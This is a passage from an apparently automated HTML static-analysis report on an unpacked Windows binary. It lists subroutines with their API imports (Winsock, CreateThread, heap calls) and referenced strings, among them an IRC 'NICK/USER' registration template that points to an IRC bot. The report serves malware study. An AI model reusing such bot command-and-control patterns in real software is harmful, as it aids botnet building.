<font color=brown></font></pre></td></tr><tr id="sub_4152AE"><td><pre><a name="sub_4152AE"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4152AE"><font size=+2>sub_4152AE</a>(edda)</font>:<font color=darkgreen>
	KERNEL32.GetLocalTime</font>
<font color=brown>
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_424F86"><td><pre><a name="sub_424F86"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_424F86"><font size=+2>sub_424F86</a>(ef2b)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_41AECC"><td><pre><a name="sub_41AECC"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41AECC"><font size=+2>sub_41AECC</a>(f47d)</font>:<font color=darkgreen>
	WININET.InternetGetConnectedStateEx</font>
<font color=brown></font></pre></td></tr><tr id="sub_416BBE"><td><pre><a name="sub_416BBE"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_416BBE"><font size=+2>sub_416BBE</a>(f5ac)</font>:<font color=brown>
	"failed"
</font></pre></td></tr><tr id="sub_40AF07"><td><pre><a name="sub_40AF07"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40AF07"><font size=+2>sub_40AF07</a>(f77f)</font>:<font color=brown>
	"real"
</font></pre></td></tr><tr id="sub_417640"><td><pre><a name="sub_417640"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_417640"><font size=+2>sub_417640</a>(f82b)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_417ABA"><td><pre><a name="sub_417ABA"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_417ABA"><font size=+2>sub_417ABA</a>(fa09)</font>:<font color=darkgreen>
	KERNEL32.CreateThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_41B9C3"><td><pre><a name="sub_41B9C3"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41B9C3"><font size=+2>sub_41B9C3</a>(fa8f)</font>:<font color=darkgreen>
	KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_41791B"><td><pre><a name="sub_41791B"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41791B"><font size=+2>sub_41791B</a>(fe0c)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket</font>
<font color=brown>
	"NICK %s\nUSER	%s \"hotmail.com\" \"127.0.0."...
</font></pre></td></tr><tr id="sub_4260E5"><td><pre><a name="sub_4260E5"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_4260E5"><font size=+2>sub_4260E5</a>(fe6c)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_40DDDF"><td><pre><a name="sub_40DDDF"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_40DDDF"><font size=+2>sub_40DDDF</a>(ff7b)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.htons
	WS2_32.connect
	WS2_32.setsockopt
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
	KERNEL32.Sleep</font>
<font color=brown>
	""
</font></pre></td></tr><tr id="sub_41ED30"><td><pre><a name="sub_41ED30"></a><a href="f73582c3a26f6d4907ab725cf483f589_unpacked.asm.html#sub_41ED30"><font size=+2>sub_41ED30</a>(ffe7)</font>:<font color=darkgreen>
	KERNEL32.VirtualFree</font>
<font color=brown></font></pre></td></tr></table><script>
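// Highlight the report row named by the URL fragment (e.g. ...asm.html#sub_40CC86).
// The fragment is used only as an id lookup key and is never written into the DOM.
// The original one-liner threw a TypeError when the page was opened without a
// fragment, or with a fragment that matches no row, because getElementById()
// returned null. Both cases are now treated as "nothing to highlight".
(function () {
  var fragment = window.location.href.split('#')[1];
  if (!fragment) {
    return; // no "#..." part in the URL
  }
  var row = document.getElementById(fragment);
  if (row) {
    row.setAttribute("style", "background-color:#ddddff");
  }
})();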
</script>
</html>